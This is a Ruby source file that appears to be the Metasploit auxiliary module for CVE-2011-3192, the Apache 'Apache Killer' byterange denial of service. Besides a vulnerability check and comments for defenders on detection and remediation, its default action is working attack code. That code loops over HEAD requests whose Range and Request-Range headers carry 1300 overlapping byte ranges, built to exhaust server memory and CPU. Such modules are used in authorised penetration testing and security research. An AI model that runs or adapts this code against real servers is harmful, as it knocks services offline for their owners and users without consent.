Path: blob/master/modules/auxiliary/dos/http/apache_range_dos.rb
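##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2011-3192 (Apache byterange filter resource
# exhaustion). It offers two actions:
#
# * DOS   - sends RLIMIT HEAD requests carrying a Range / Request-Range header
#           with many overlapping byte ranges (the default action).
# * CHECK - sends a single HEAD request with a short multi-range header and
#           records a note of type 'apache.killer' when the reply is HTTP 206.
#
# Reviewer notes for defenders:
# * CHECK is a heuristic. A 206 only shows that the server answered the
#   multi-range request with partial content; it does not prove the running
#   build is one of the affected releases named in the description. Confirm
#   against the installed version / vendor patch level before acting on it.
# * The traffic is recognisable in access logs and at a proxy/WAF as HEAD
#   requests whose Range or Request-Range header lists an unusually large
#   number of comma-separated ranges.
# * Remediation is to run a release newer than the affected ranges listed in
#   the description; where that is not yet possible, capping or stripping
#   Range / Request-Range headers with many ranges at the front end reduces
#   exposure.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Dos

  # Registers module metadata (name, references, actions) and the
  # user-settable options RPORT, URI and RLIMIT.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache Range Header DoS (Apache Killer)',
      'Description' => %q{
        The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x
        through 2.2.19 allows remote attackers to cause a denial of service (memory and
        CPU consumption) via a Range header that expresses multiple overlapping ranges,
        exploit called "Apache Killer"
      },
      'Author' =>
        [
          'Kingcope', # original discoverer
          'Masashi Fujiwara', # metasploit module
          'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
        ],
      'License' => MSF_LICENSE,
      'Actions' =>
        [
          ['DOS', 'Description' => 'Trigger Denial of Service against target'],
          ['CHECK', 'Description' => 'Check if target is vulnerable']
        ],
      'DefaultAction' => 'DOS',
      'References' =>
        [
          [ 'BID', '49303'],
          [ 'CVE', '2011-3192'],
          [ 'EDB', '17696'],
          [ 'OSVDB', '74721' ],
        ],
      'DisclosureDate' => '2011-08-19'
    ))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('URI', [ true, "The request URI", '/']),
        OptInt.new('RLIMIT', [ true, "Number of requests to send", 50])
      ])
  end

  # Scanner entry point: dispatches to the handler for the selected action.
  # An action name other than 'DOS' or 'CHECK' does nothing.
  #
  # @param ip [String] host handed in by the scanner mixin (not read here;
  #   both handlers take the target from datastore['RHOST'])
  def run_host(ip)
    case action.name
    when 'DOS'
      conduct_dos()
    when 'CHECK'
      check_for_dos()
    end
  end

  # Sends one HEAD request with a short multi-range header and reports the
  # target as affected when the server answers 206 Partial Content.
  #
  # The outcome is a heuristic (see the class comment). Three cases are kept
  # apart so that a failed probe is never read as a clean result:
  # * 206             -> finding printed and stored via report_note
  # * other response  -> "doesn't seem to be vulnerable"
  # * no response or a connection error -> reported as undetermined
  def check_for_dos()
    uri = datastore['URI']
    rhost = datastore['RHOST']
    # The same value is sent in both headers.
    probe_ranges = "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"

    begin
      res = send_request_cgi({
        'uri' => uri,
        'method' => 'HEAD',
        'headers' => {
          "HOST" => rhost,
          "Range" => probe_ranges,
          "Request-Range" => probe_ranges
        }
      })

      if res.nil?
        # Previously a missing response fell through to the "not vulnerable"
        # message, which turns an unreachable or filtered host into a false
        # negative in the scan output.
        print_error("No response from #{rhost}:#{rport}; cannot determine status at #{uri}")
      elsif res.code == 206
        print_status("Response was #{res.code}")
        print_status("Found Byte-Range Header DOS at #{uri}")

        report_note(
          :host => rhost,
          :port => rport,
          :type => 'apache.killer',
          :data => "Apache Byte-Range DOS at #{uri}"
        )
      else
        print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      # These were swallowed silently before; surface them so the operator
      # knows the host was not actually assessed.
      print_error("Couldn't connect to #{rhost}:#{rport}; cannot determine status at #{uri}")
    rescue ::Timeout::Error, ::Errno::EPIPE
      print_error("Connection to #{rhost}:#{rport} timed out or was closed; cannot determine status at #{uri}")
    end
  end

  # Sends RLIMIT HEAD requests whose Range / Request-Range value is
  # "bytes=0-" followed by the ranges 5-0 through 5-1299.
  #
  # Each request is issued with a second argument of 1 to send_request_cgi
  # (the response wait, in seconds) and the response itself is discarded.
  def conduct_dos()
    uri = datastore['URI']
    rhost = datastore['RHOST']
    ranges = (0..1299).map { |i| ",5-#{i}" }.join

    (1..datastore['RLIMIT']).each do |x|
      begin
        print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
        send_request_cgi({
          'uri' => uri,
          'method' => 'HEAD',
          'headers' => {
            "HOST" => rhost,
            "Range" => "bytes=0-#{ranges}",
            "Request-Range" => "bytes=0-#{ranges}"
          }
        }, 1)
      rescue ::Rex::ConnectionRefused
        print_error("Unable to connect to #{rhost}:#{rport}")
      rescue ::Errno::ECONNRESET
        # NOTE(review): a reset is reported as success, but it can equally
        # come from a proxy or WAF dropping the request; treat this message
        # as an indication, not as proof that the service is down.
        print_good("DoS packet successful. #{rhost} not responding.")
      rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
        print_error("Couldn't connect to #{rhost}:#{rport}")
      rescue ::Timeout::Error, ::Errno::EPIPE
        # Deliberately ignored: with a one-second wait a timeout or broken
        # pipe is expected here, and the loop moves on to the next request.
      end
    end
  end
end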